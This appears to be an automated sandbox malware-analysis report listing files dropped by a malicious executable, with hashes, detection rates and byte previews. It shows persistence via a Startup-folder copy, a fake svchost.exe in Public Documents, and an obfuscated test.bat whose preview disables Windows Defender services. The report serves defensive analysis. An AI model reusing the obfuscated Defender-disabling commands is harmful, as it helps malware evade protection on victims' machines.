                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1053624
                                                                                      Entropy (8bit):6.324012336357782
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:M1VPzxljWH+fdg8yXresMdJFBwA48ayWMWPX6+Pqpn7PJuhgqCakBu7:yzxljW+g3Xub48ayWlK+ipnLJuhVkA7
                                                                                      MD5:44696D252000850D3EA71D9AE238AEDC
                                                                                      SHA1:1FB61A1DF500F9025641526CB4013D555B129A84
                                                                                      SHA-256:1B39D6BF218028DFE7BC8254A3B1682804E9BF05B8298C708C318236F64AD986
                                                                                      SHA-512:E1115A0A70B6D532633C1C60733A2AEBBDC9E14863DEAEC7F6E15604C20F9F3CE3D36132EC2B814A4C774B25A6C4C8CCAD4003724B98ABEAD2BE3F752B9D6314
                                                                                      Malicious:true
                                                                                      Antivirus:
• Antivirus: Virustotal, Detection: 46%
• Antivirus: Metadefender, Detection: 23%
                                                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..............0.................. ... ....@.. .......................`............`.....................................J.... ..D....................@......N................................................ ............... ..H............text........ ...................... ..`.rsrc...D.... ......................@..@.reloc.......@......................@..@................4.......H.......D...$.......7...hZ...................................................S..`.@..a...B.?.LG........m.*..mLH`|.....q.......l...'..H..y....h.3..e...-t..m.=.Z.l2..~..Cw.X....3.. .............r$$r.4...h.\.D..N........p..Q.M#z_.t...)....W.i{&~>.i.rZg.g..WX.R.."*.|f....k....A.a............N..).-u.5.8].................!V.......2.<.'.{.f1.b.yD..O`....$(..... ...]>n.&.....o....`..+.N......2...x....N...V....._D/.. .NK..D.F....6..<...#g.....$.6.#%.K..`.1....V.l.3.[,..v
                                                                                      C:\Users\Public\Documents\2FDD6624\svchost.exe:Zone.Identifier
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):14734
                                                                                      Entropy (8bit):4.993014478972177
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                      MD5:8D5E194411E038C060288366D6766D3D
                                                                                      SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                      SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                      SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):19924
                                                                                      Entropy (8bit):5.558127555463889
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:tt9ZRq0a+lCZSGMYSB+MjultIG8tiQeZUD1u16zGumaEJUQYFeAD:NjGMY49CltsEpG3G/NZg
                                                                                      MD5:B36AD5223EF4DCA564037EC9D2C4FF18
                                                                                      SHA1:3A49315B5784E5C22FE87B228C709B157715FC3F
                                                                                      SHA-256:15F99480EC16F09AD0E38A42CD60AE5D7806142484951FA92E0745F04F0EEE32
                                                                                      SHA-512:6F0F2B4E872F9B4B797854E0F0A14BB23F6A37A6E5B14AE9C8822A2BDF76E3EF3F07FD351B3A3880C5D04ED1CE17DFFBFC61EA2B3D124B18200D8250138864E4
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @...e...........G.......H.O..........................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementP................./.C..J..%...].......%.Microsoft.PowerShell.Com
                                                                                      C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe
                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):91000
                                                                                      Entropy (8bit):6.241345766746317
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                      MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                      SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                      SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Virustotal, Detection: 0%
                                                                                      • Antivirus: Metadefender, Detection: 3%
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat
                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8399
                                                                                      Entropy (8bit):4.665734428420432
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                      MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                      SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                      SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                      SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                      C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe
                                                                                      Process:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):91000
                                                                                      Entropy (8bit):6.241345766746317
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                      MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                      SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                      SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Virustotal, Detection: 0%
                                                                                      • Antivirus: Metadefender, Detection: 3%
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat
                                                                                      Process:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8399
                                                                                      Entropy (8bit):4.665734428420432
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                      MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                      SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                      SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                      SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                      C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):91000
                                                                                      Entropy (8bit):6.241345766746317
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                      MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                      SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                      SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8399
                                                                                      Entropy (8bit):4.665734428420432
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                      MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                      SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                      SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                      SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                      C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe
                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):91000
                                                                                      Entropy (8bit):6.241345766746317
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                      MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                      SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                      SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat
                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8399
                                                                                      Entropy (8bit):4.665734428420432
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                      MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                      SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                      SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                      SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lspoaje.tcq.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3255sxic.got.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
The following 18 dropped files have identical attributes, listed once here:
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Reputation:unknown
Preview: 1
Files:
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hvfzt5y.uov.ps1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5stcexqa.mjh.ps1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dci5vt12.o2u.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eiuvcs12.lov.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h00p3kfi.mal.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpq1hxdx.5bu.ps1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_julunsxd.nk1.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfhky3a4.nkp.ps1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3nafo4w.jjh.ps1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdaahtvp.wcr.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qobie0yt.3py.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxbwq3x5.3vw.ps1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skdig1ki.bhc.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skw0nnic.ute.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3mj0yao.kun.ps1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsyzh3ek.kz4.ps1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yaftruwr.5iy.psm1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yprbbuxu.tzk.psm1
                                                                                      C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe
                                                                                      Process:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):91000
                                                                                      Entropy (8bit):6.241345766746317
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                      MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                      SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                      SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
